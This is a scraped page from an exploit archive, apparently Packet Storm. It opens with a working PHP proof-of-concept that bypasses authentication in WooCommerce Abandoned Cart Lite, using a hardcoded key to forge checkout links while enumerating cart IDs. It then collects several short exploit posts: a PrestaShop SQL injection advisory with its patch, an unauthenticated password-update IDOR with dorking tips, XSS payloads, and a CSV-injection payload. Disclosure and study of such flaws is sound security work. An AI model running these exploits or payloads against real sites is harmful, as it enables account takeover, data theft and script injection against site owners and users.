2.8     */    private static function subBytes( $s, $Nb ) {        for ( $r = 0; $r < 4; $r++ ) {            for ( $c = 0; $c < $Nb;            $c++ ) {                $s[ $r ][ $c ] = self::$sBox[ $s[ $r ][ $c ] ];            }        }        return $s;    }    /**     * Shift row r of state S left by r bytes [�5.1.2].     *     * @since 2.8     */    private static function shiftRows( $s, $Nb ) {        $t = array( 4 );        for ( $r = 1; $r < 4; $r++ ) {            for ( $c = 0; $c < 4;            $c++ ) {                $t[ $c ] = $s[ $r ][ ( $c + $r ) % $Nb ]; // shift into temp copy            }            for ( $c = 0; $c < 4;            $c++ ) {                $s[ $r ][ $c ] = $t[ $c ]; // and copy back            }        } // note that this will work for Nb=4,5,6, but not 7,8 (always 4 for AES):        return $s; // see fp.gladman.plus.com/cryptography_technology/rijndael/aes.spec.311.pdf    }    /**     * Combine bytes of each col of state S [�5.1.3].     *     * @since 2.8     */    private static function mixColumns( $s, $Nb ) {        for ( $c = 0; $c < 4; $c++ ) {            $a = array( 4 ); // 'a' is a copy of the current column from 's'            $b = array( 4 ); // 'b' is a�{02} in GF(2^8)            for ( $i = 0; $i < 4; $i++ ) {                $a[ $i ] = $s[ $i ][ $c ];                $b[ $i ] = $s[ $i ][ $c ] & 0x80 ? $s[ $i ][ $c ] << 1 ^ 0x011b : $s[ $i ][ $c ] << 1;            }            // a[n] ^ b[n] is a�{03} in GF(2^8)            $s[0][ $c ] = $b[0] ^ $a[1] ^ $b[1] ^ $a[2] ^ $a[3]; // 2*a0 + 3*a1 + a2 + a3            $s[1][ $c ] = $a[0] ^ $b[1] ^ $a[2] ^ $b[2] ^ $a[3]; // a0 * 2*a1 + 3*a2 + a3            $s[2][ $c ] = $a[0] ^ $a[1] ^ $b[2] ^ $a[3] ^ $b[3]; // a0 + a1 + 2*a2 + 3*a3            $s[3][ $c ] = $a[0] ^ $b[0] ^ $a[1] ^ $a[2] ^ $b[3]; // 3*a0 + a1 + a2 + 2*a3        }        return $s;    }    /**     * Generate Key Schedule from Cipher Key [�5.2].     *     * Perform key expansion on cipher key to generate a key schedule.     *     * @param  key cipher key byte-array (16 bytes).     * @return key schedule as 2D byte-array (Nr+1 x Nb bytes).     * @since 2.8     */    public static function keyExpansion( $key ) {        $Nb = 4; // block size (in words): no of columns in state (fixed at 4 for AES)        $Nk = count( $key ) / 4; // key length (in words): 4/6/8 for 128/192/256-bit keys        $Nr = $Nk + 6; // no of rounds: 10/12/14 for 128/192/256-bit keys        $w    = array();        $temp = array();        for ( $i = 0; $i < $Nk; $i++ ) {            $r       = array( $key[ 4 * $i ], $key[ 4 * $i + 1 ], $key[ 4 * $i + 2 ], $key[ 4 * $i + 3 ] );            $w[ $i ] = $r;        }        for ( $i = $Nk; $i < ( $Nb * ( $Nr + 1 ) ); $i++ ) {            $w[ $i ] = array();            for ( $t = 0; $t < 4;            $t++ ) {                $temp[ $t ] = $w[ $i - 1 ][ $t ];            }            if ( $i % $Nk == 0 ) {                $temp = self::subWord( self::rotWord( $temp ) );                for ( $t = 0; $t < 4;                $t++ ) {                    $temp[ $t ] ^= self::$rCon[ $i / $Nk ][ $t ];                }            } elseif ( $Nk > 6 && $i % $Nk == 4 ) {                $temp = self::subWord( $temp );            }            for ( $t = 0; $t < 4;            $t++ ) {                $w[ $i ][ $t ] = $w[ $i - $Nk ][ $t ] ^ $temp[ $t ];            }        }        return $w;    }    /**     * Apply SBox to 4-byte word w.     *     * @since 2.8     */    private static function subWord( $w ) {        for ( $i = 0; $i < 4;        $i++ ) {            $w[ $i ] = self::$sBox[ $w[ $i ] ];        }        return $w;    }    /**     * Rotate 4-byte word w left by one byte.     *     * @since 2.8     */    private static function rotWord( $w ) {        $tmp = $w[0];        for ( $i = 0; $i < 3;        $i++ ) {            $w[ $i ] = $w[ $i + 1 ];        }        $w[3] = $tmp;        return $w;    }    // sBox is pre-computed multiplicative inverse in GF(2^8) used in subBytes and keyExpansion [�5.1.1]    private static $sBox = array(        0x63,        0x7c,        0x77,        0x7b,        0xf2,        0x6b,        0x6f,        0xc5,        0x30,        0x01,        0x67,        0x2b,        0xfe,        0xd7,        0xab,        0x76,        0xca,        0x82,        0xc9,        0x7d,        0xfa,        0x59,        0x47,        0xf0,        0xad,        0xd4,        0xa2,        0xaf,        0x9c,        0xa4,        0x72,        0xc0,        0xb7,        0xfd,        0x93,        0x26,        0x36,        0x3f,        0xf7,        0xcc,        0x34,        0xa5,        0xe5,        0xf1,        0x71,        0xd8,        0x31,        0x15,        0x04,        0xc7,        0x23,        0xc3,        0x18,        0x96,        0x05,        0x9a,        0x07,        0x12,        0x80,        0xe2,        0xeb,        0x27,        0xb2,        0x75,        0x09,        0x83,        0x2c,        0x1a,        0x1b,        0x6e,        0x5a,        0xa0,        0x52,        0x3b,        0xd6,        0xb3,        0x29,        0xe3,        0x2f,        0x84,        0x53,        0xd1,        0x00,        0xed,        0x20,        0xfc,        0xb1,        0x5b,        0x6a,        0xcb,        0xbe,        0x39,        0x4a,        0x4c,        0x58,        0xcf,        0xd0,        0xef,        0xaa,        0xfb,        0x43,        0x4d,        0x33,        0x85,        0x45,        0xf9,        0x02,        0x7f,        0x50,        0x3c,        0x9f,        0xa8,        0x51,        0xa3,        0x40,        0x8f,        0x92,        0x9d,        0x38,        0xf5,        0xbc,        0xb6,        0xda,        0x21,        0x10,        0xff,        0xf3,        0xd2,        0xcd,        0x0c,        0x13,        0xec,        0x5f,        0x97,        0x44,        0x17,        0xc4,        0xa7,        0x7e,        0x3d,        0x64,        0x5d,        0x19,        0x73,        0x60,        0x81,        0x4f,        0xdc,        0x22,        0x2a,        0x90,        0x88,        0x46,        0xee,        0xb8,        0x14,        0xde,        0x5e,        0x0b,        0xdb,        0xe0,        0x32,        0x3a,        0x0a,        0x49,        0x06,        0x24,        0x5c,        0xc2,        0xd3,        0xac,        0x62,        0x91,        0x95,        0xe4,        0x79,        0xe7,        0xc8,        0x37,        0x6d,        0x8d,        0xd5,        0x4e,        0xa9,        0x6c,        0x56,        0xf4,        0xea,        0x65,        0x7a,        0xae,        0x08,        0xba,        0x78,        0x25,        0x2e,        0x1c,        0xa6,        0xb4,        0xc6,        0xe8,        0xdd,        0x74,        0x1f,        0x4b,        0xbd,        0x8b,        0x8a,        0x70,        0x3e,        0xb5,        0x66,        0x48,        0x03,        0xf6,        0x0e,        0x61,        0x35,        0x57,        0xb9,        0x86,        0xc1,        0x1d,        0x9e,        0xe1,        0xf8,        0x98,        0x11,        0x69,        0xd9,        0x8e,        0x94,        0x9b,        0x1e,        0x87,        0xe9,        0xce,        0x55,        0x28,        0xdf,        0x8c,        0xa1,        0x89,        0x0d,        0xbf,        0xe6,        0x42,        0x68,        0x41,        0x99,        0x2d,        0x0f,        0xb0,        0x54,        0xbb,        0x16,    );    // rCon is Round Constant used for the Key Expansion [1st col is 2^(r-1) in GF(2^8)] [�5.2]    private static $rCon = array(        array( 0x00, 0x00, 0x00, 0x00 ),        array( 0x01, 0x00, 0x00, 0x00 ),        array( 0x02, 0x00, 0x00, 0x00 ),        array( 0x04, 0x00, 0x00, 0x00 ),        array( 0x08, 0x00, 0x00, 0x00 ),        array( 0x10, 0x00, 0x00, 0x00 ),        array( 0x20, 0x00, 0x00, 0x00 ),        array( 0x40, 0x00, 0x00, 0x00 ),        array( 0x80, 0x00, 0x00, 0x00 ),        array( 0x1b, 0x00, 0x00, 0x00 ),        array( 0x36, 0x00, 0x00, 0x00 ),    );}function urs( $a, $b ) {        $a  = intval( $a ) & 0xffffffff;        $b &= 0x1f; // (bounds check)        if ( $a & 0x80000000 && $b > 0 ) { // if left-most bit set.            $a     = ( $a >> 1 ) & 0x7fffffff; // right-shift one bit & clear left-most bit.            $check = $b - 1;            $a     = $a >> ( $check ); // remaining right-shifts.        } else { // otherwise.            $a = ( $a >> $b ); // use normal right-shift.        }        return $a;    }   function encrypt( $plaintext, $password, $nBits ) {        $blockSize = 16; // block size fixed at 16 bytes / 128 bits (Nb=4) for AES        if ( ! ( $nBits == 128 || $nBits == 192 || $nBits == 256 ) ) {            return ''; // standard allows 128/192/256 bit keys        }        // note PHP (5) gives us plaintext and password in UTF8 encoding!        // use AES itself to encrypt password to get cipher key (using plain password as source for        // key expansion) - gives us well encrypted key        $nBytes  = $nBits / 8; // no bytes in key        $pwBytes = array();        for ( $i = 0; $i < $nBytes;        $i++ ) {            $pwBytes[ $i ] = ord( substr( $password, $i, 1 ) ) & 0xff;        }        $key = Wcal_Aes::cipher( $pwBytes, Wcal_Aes::keyExpansion( $pwBytes ) );        $key = array_merge( $key, array_slice( $key, 0, $nBytes - 16 ) ); // expand key to 16/24/32 bytes long        // initialise 1st 8 bytes of counter block with nonce (NIST SP800-38A �B.2): [0-1] = millisec,        // [2-3] = random, [4-7] = seconds, giving guaranteed sub-ms uniqueness up to Feb 2106        $counterBlock = array();        $nonce        = floor( microtime( true ) * 1000 ); // timestamp: milliseconds since 1-Jan-1970        $nonceMs      = $nonce % 1000;        $nonceSec     = floor( $nonce / 1000 );        $nonceRnd     = floor( rand( 0, 0xffff ) );        for ( $i = 0; $i < 2;        $i++ ) {            $counterBlock[ $i ] = urs( $nonceMs, $i * 8 ) & 0xff;        }        for ( $i = 0; $i < 2;        $i++ ) {            $counterBlock[ $i + 2 ] = urs( $nonceRnd, $i * 8 ) & 0xff;        }        for ( $i = 0; $i < 4;        $i++ ) {            $counterBlock[ $i + 4 ] = urs( $nonceSec, $i * 8 ) & 0xff;        }        // and convert it to a string to go on the front of the ciphertext        $ctrTxt = '';        for ( $i = 0; $i < 8;        $i++ ) {            $ctrTxt .= chr( $counterBlock[ $i ] );        }        // generate key schedule - an expansion of the key into distinct Key Rounds for each round        $keySchedule = Wcal_Aes::keyExpansion( $key );        // print_r($keySchedule);        $blockCount = ceil( strlen( $plaintext ) / $blockSize );        $ciphertxt  = array(); // ciphertext as array of strings        for ( $b = 0; $b < $blockCount; $b++ ) {            // set counter (block #) in last 8 bytes of counter block (leaving nonce in 1st 8 bytes)            // done in two stages for 32-bit ops: using two words allows us to go past 2^32 blocks (68GB)            for ( $c = 0; $c < 4;            $c++ ) {                $counterBlock[ 15 - $c ] = urs( $b, $c * 8 ) & 0xff;            }            for ( $c = 0; $c < 4;            $c++ ) {                $counterBlock[ 15 - $c - 4 ] = urs( $b / 0x100000000, $c * 8 );            }            $cipherCntr = Wcal_Aes::cipher( $counterBlock, $keySchedule ); // -- encrypt counter block --            // block size is reduced on final block            $blockLength = $b < $blockCount - 1 ? $blockSize : ( strlen( $plaintext ) - 1 ) % $blockSize + 1;            $cipherByte  = array();            for ( $i = 0; $i < $blockLength; $i++ ) { // -- xor plaintext with ciphered counter byte-by-byte --                $cipherByte[ $i ] = $cipherCntr[ $i ] ^ ord( substr( $plaintext, $b * $blockSize + $i, 1 ) );                $cipherByte[ $i ] = chr( $cipherByte[ $i ] );            }            $ciphertxt[ $b ] = implode( '', $cipherByte ); // escape troublesome characters in ciphertext        }        // implode is more efficient than repeated string concatenation        $ciphertext = $ctrTxt . implode( '', $ciphertxt );        $ciphertext = base64_encode( $ciphertext );        return $ciphertext;    }/*******************************************************************************/function fetch_url_content($url) {    $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);     curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // Follow redirects    curl_setopt($ch, CURLOPT_HEADER, true);    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);    $output = curl_exec($ch);    if (curl_errno($ch)) {        echo '[-] Error:' . curl_error($ch)."\n";        return False;    }    // Get the status code    $statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);    // Get header size    $headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE);    // Separate the headers from the output    $header = substr($output, 0, $headerSize);    $body = substr($output, $headerSize);    curl_close($ch);        // Return headers, body and status code    return [        'header' => $header,        'body' => $body,        'status_code' => $statusCode    ];}if ($argc != 4) {    echo "[-] Usage: php poc.php http://target_host target_port max_cart_id_to_enumerate\n";    exit(1);}$host = $argv[1];$port = $argv[2];// The maximum cart ID to enumerate$max_id = intval($argv[3]);function exploit_link($host,$port,$id,$encryption_key){    $validate_val = $id.'&url='.$host.':'.$port.'/checkout/';    $encrypted_val = encrypt($validate_val, $encryption_key, 256);    $url = $host.':'.$port.'/?wcal_action=checkout_link&user_email=test&validate='.$encrypted_val;    $result = fetch_url_content($url);    if ($result == False){        return False;    }        if ($result['body'] == 'Link expired') {        return False;    } else {        // Looking for username        preg_match('/Set-Cookie:.*wordpress_.*=(.*?)%/', $result['header'], $matches);        $username = isset($matches[1]) ? $matches[1] : null;        if ($username){            echo "[+] Authentication Bypass URL for user '".$username."' : ".$url."\n";            return True;        }else{            return False;        }            }}for ($id = 1; $id <= $max_id; $id++) {    echo "[*] Enumerating cart ID : ".$id."\n";    // Hardcoded Encryption key    $encryption_key = 'qJB0rGtIn5UB1xG03efyCp';    $res = exploit_link($host,$port,$id,$encryption_key);    if (! $res){        // In the docker instance I tried, it had empty encryption key for somereason        $encryption_key = '';        $res = exploit_link($host,$port,$id,$encryption_key);    }}?>

WordPress Abandoned Cart Lite For WooCommerce 5.14.2 Authentication Bypass

In the PrestaShop < 2.4.3 module "Length, weight or volume sell" (ailinear) there is a SQL injection vulnerability.

In the module “Length, weight or volume sell” (ailinear) for PrestaShop, an attacker can perform SQL injection up to 2.4.3. Release 2.4.3 fixed this security issue.

**Summary**

*   **CVE ID**: CVE-2023-31672
*   **Published at**: 2023-06-15
*   **Advisory source**: Friends-Of-Presta.org
*   **Platform**: PrestaShop
*   **Product**: ailinear
*   **Impacted release**: < 2.4.3 (2.4.3 fixed the vulnerability)
*   **Product author**: ai-dev
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

Up to 2.4.3, a sensitive SQL call in file includes/ajax.php can be executed with a trivial http call and exploited to forge a blind SQL injection throught the POST or GET submitted others and more variables.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: low
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data on the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to exposed tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijacked emails

**Patch**

    --- a/ailinear/includes/ajax.php
    +++ b/ailinear/includes/ajax.php
    @@ -346,17 +346,23 @@ if (Tools::getIsset('action')) {
         $request_value = Tools::getIsset('value') ? Tools::getValue('value') : 0;
         $request_product = (int)Tools::getValue('product');
         $request_more = Tools::getValue('more');
    -    $request_others = Tools::getValue('others');
    +    $request_others = (int)Tools::getValue('others');
         $request_quantity = (int)Tools::getValue('qty');
     
         /* Test if base combination exists */
         if ($request_more != '') {
    -        $more = explode('_', $request_more);
    +        $more_attributes = explode('_', $request_more);
    +        $more_attributes = array_map('intval', $more_attributes);
    +        foreach ($more_attributes as $key => $attr) {
    +            if (!$attr) {
    +                unset($more_attributes[$key]);
    +            }
    +        }
             
             /* Get the id_product_attribute (the first is the default one)*/
             $result = DB::getInstance()->ExecuteS(
                 'SELECT COUNT(id_product_attribute) as number, id_product_attribute FROM '._DB_PREFIX_.'product_attribute_combination WHERE id_product_attribute IN (SELECT id_product_attribute FROM '._DB_PREFIX_.'product_attribute WHERE '.
    -            'id_product = '.$request_product.') AND id_attribute IN ('.implode(', ', $more).') GROUP BY id_product_attribute HAVING number = '.count($more).' ORDER BY id_product_attribute ASC'
    +            'id_product = '.$request_product.') AND id_attribute IN ('.implode(', ', $more_attributes).') GROUP BY id_product_attribute HAVING number = '.count($more_attributes).' ORDER BY id_product_attribute ASC'
             );
             
             /* Get the attributes values and lang for the product */
    @@ -364,6 +370,8 @@ if (Tools::getIsset('action')) {
                 die('Unknown');
             }
         } else {
    +        $more_attributes = array();
    +        
             /* Get the id_product_attribute (the first is the default one)*/
             $result = DB::getInstance()->ExecuteS('SELECT COUNT(id_product_attribute) as number, id_product_attribute FROM '._DB_PREFIX_.'product_attribute WHERE id_product = '.$request_product.' ORDER BY id_product_attribute ASC');
         }
    @@ -373,13 +381,6 @@ if (Tools::getIsset('action')) {
             $return = 'Message->'.$module->l('Message for delayed preparation', 'ajax').'|';
         }
     
    -    /* Get attributes */
    -    if ($request_more != '') {
    -        $more_attributes = explode('_', $request_more);
    -    } else {
    -        $more_attributes = array();
    -    }
    -
         /* Get price changes */
         $more_attributes_price = 0;
         if (count($more_attributes)) {
    

**Other recommendations**

*   Upgrade PrestaShop to the latest version to disable multiquery execution (separated by “;”)
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skilled because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2023-03-08

Vunlnerability found during a audit by 202 ecommerce

2023-03-08

Contact the author

2023-03-08

The author confirm the issue and supply a fixed release

2023-04-23

Request a CVE ID

2023-06-15

Publication of this advisory

**Links**

*   Author product page
*   National Vulnerability Database

CVE-2023-31672: [CVE-2023-31672] Improper neutralization of an SQL parameter in ailinear module for PrestaShop

Purle Devloper Panel version 1.0 suffers from an insecure direct object reference vulnerability that allows an unauthenticated user to update passwords.

    ====================================================================================================================================| # Title     : Purle Devloper Panel ver 1.0 Unauthorized administrative access Vulnerability                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : http://www.njmweb.we.bs/Purple10/PURPLEV10.zip                                                                     |  | # Dork      : "Purle Devloper Panel"                                                                                             |====================================================================================================================================poc :[+] an unauthenticated access allow you to update password.[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /user_update.php[+] https://127.0.0.1/purple.iprebrandsapp/user_update.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Purle Devloper Panel 1.0 Insecure Direct Object Reference

phpFK version 8.0 suffers from a cross site scripting vulnerability.

**phpFK 8.0 Cross Site Scripting**

Posted Jun 15, 2023

Authored by indoushka

phpFK version 8.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 485c60ad53bb4abb98ff8bd8586f25cee5d5a57abf5f55c1615b45b7b607c8e0

Download | Favorite | View

**phpFK 8.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : phpFK v8.0 version XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : https://www.frank-karau.de/demo-forum/                                                                             |  | # Dork      : Powered by: phpFK                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,379)
*   Arbitrary (16,086)
*   BBS (2,859)
*   Bypass (1,697)
*   CGI (1,024)
*   Code Execution (7,179)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,321)
*   DoS (23,204)
*   Encryption (2,363)
*   Exploit (51,247)
*   File Inclusion (4,196)
*   File Upload (956)
*   Firewall (821)
*   Info Disclosure (2,722)
*   Intrusion Detection (885)
*   Java (3,003)
*   JavaScript (842)
*   Kernel (6,586)
*   Local (14,394)
*   Magazine (586)
*   Overflow (12,621)
*   Perl (1,423)
*   PHP (5,129)
*   Proof of Concept (2,335)
*   Protocol (3,567)
*   Python (1,510)
*   Remote (30,539)
*   Root (3,567)
*   Rootkit (506)
*   Ruby (609)
*   Scanner (1,633)
*   Security Tool (7,856)
*   Shell (3,165)
*   Shellcode (1,211)
*   Sniffer (893)
*   Spoof (2,189)
*   SQL Injection (16,237)
*   TCP (2,395)
*   Trojan (687)
*   UDP (884)
*   Virus (664)
*   Vulnerability (31,601)
*   Web (9,579)
*   Whitepaper (3,745)
*   x86 (961)
*   XSS (17,701)
*   Other

**File Archives**

*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,980)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,762)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (345)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,894)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,380)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,666)
*   UNIX (9,249)
*   UnixWare (186)
*   Windows (6,558)
*   Other

phpFK 8.0 Cross Site Scripting

projectSend version r1605 suffers from a CSV injection vulnerability.

    Exploit Title: projectSend r1605 - CSV injectionVersion: r1605Bugs:  CSV InjectionTechnology: PHPVendor URL: https://www.projectsend.org/Software Link: https://www.projectsend.org/Date of found: 11-06-2023Author: Mirabbas AğalarovTested on: Windows2. Technical Details & POC========================================Step 1. login as userstep 2. Go to My Account ( http://localhost/users-edit.php?id=2 )step 3. Set name as  =calc|a!z|step 3. If admin Export action-log as CSV  file ,in The computer of admin  occurs csv injection and will open calculator ( http://localhost/actions-log.php )payload: =calc|a!z|

projectSend r1605 CSV Injection

projectSend version r1605 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: projectSend r1605 - Stored XSSApplication: projectSendVersion: r1605Bugs:  Stored XssTechnology: PHPVendor URL: https://www.projectsend.org/Software Link: https://www.projectsend.org/Date of found: 11-06-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================1. Login as admin2. Go to Custom Html/Css/Js (http://localhost/custom-assets.php)3. Go to new JS (http://localhost/custom-assets-add.php?language=js)4. Set content as  alert("xss"); and set public 5. And Save6. Go to http://localhost (logout)payload: alert("xss")POST /custom-assets-add.php HTTP/1.1Host: localhostContent-Length: 171Cache-Control: max-age=0sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/custom-assets-add.php?language=jsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: log_download_started=false; PHPSESSID=7j8g8u9t7khb259ci4fvareg2lConnection: closecsrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dab&language=js&title=test&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head

projectSend r1605 Cross Site Scripting

An arbitrary file upload vulnerability in the component /api/upload.php of ThinkAdmin v6 allows attackers to execute arbitrary code via a crafted file.

Tag

#php